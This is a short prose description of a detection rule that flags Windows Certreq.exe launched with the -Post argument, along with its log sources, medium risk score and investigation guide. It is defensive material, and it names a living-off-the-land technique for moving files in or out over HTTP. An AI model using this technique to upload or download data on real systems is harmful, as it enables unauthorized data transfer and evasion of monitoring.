This detection rule identifies the misuse of the `Certreq` tool in Windows, which is traditionally used for managing certificates. Adversaries can exploit `Certreq` to upload or download files by making HTTP POST requests, potentially leading to unauthorized data transfers. The rule triggers on process executions where `Certreq.exe` is initiated with the `-Post` argument. It leverages EQL queries over a diverse set of logs, including Winlogbeat and various endpoint security logs, to detect these anomalies. The risk score is set at 47, indicating a medium severity level, highlighting the importance of monitoring this behavior closely. A comprehensive investigation guide is provided to assist analysts in assessing the event, including a series of steps to evaluate the context and legitimacy of the activity, ties to user accounts, and the reputation of any associated domains or IP addresses. It integrates actionable response measures to mitigate any identified threats and prevent further exploitation.